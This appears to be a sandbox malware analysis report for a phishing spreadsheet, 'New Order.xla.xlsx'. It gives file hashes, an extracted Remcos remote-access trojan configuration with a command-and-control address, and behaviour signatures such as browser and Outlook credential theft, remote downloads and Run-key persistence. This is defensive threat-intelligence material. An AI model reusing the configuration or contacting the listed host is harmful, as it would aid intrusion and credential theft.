General

  • Target

    New Order.xla.xlsx

  • Size

    239KB

  • Sample

    240430-gek1xaec8x

  • MD5

    c6fcd4edb55b0d97854fb0ef475ecbdf

  • SHA1

    6bf1aa4de0ba70680525b55162a18a1eafe0d62c

  • SHA256

    0e07267ac23262005fdd2103b99b2977a6f3212c8489ceed4c148f8012ca67d1

  • SHA512

    f82aab889fec106e9e6a0386a6f9541782580d9998a6dcec576ec820718ccd41df001e7fac2de14b3f832920e733afec167c87d01228efff7786f898b43a5268

  • SSDEEP

    6144:qd4UcLe0JOqPQZR8MDdATCR3tSv0W8RU46zpDFSY:NUP/qPQZR8MxAm/S8W8+9p4Y

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Targets

    • Target

      New Order.xla.xlsx

    • Size

      239KB

    • MD5

      c6fcd4edb55b0d97854fb0ef475ecbdf

    • SHA1

      6bf1aa4de0ba70680525b55162a18a1eafe0d62c

    • SHA256

      0e07267ac23262005fdd2103b99b2977a6f3212c8489ceed4c148f8012ca67d1

    • SHA512

      f82aab889fec106e9e6a0386a6f9541782580d9998a6dcec576ec820718ccd41df001e7fac2de14b3f832920e733afec167c87d01228efff7786f898b43a5268

    • SSDEEP

      6144:qd4UcLe0JOqPQZR8MDdATCR3tSv0W8RU46zpDFSY:NUP/qPQZR8MxAm/S8W8+9p4Y

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

    • NirSoft MailPassView

      Password recovery tool for various email clients

    • NirSoft WebBrowserPassView

      Password recovery tool for various web browsers

    • Nirsoft

    • Blocklisted process makes network request

    • Abuses OpenXML format to download file from external location

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses Microsoft Outlook accounts

    • Adds Run key to start application

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks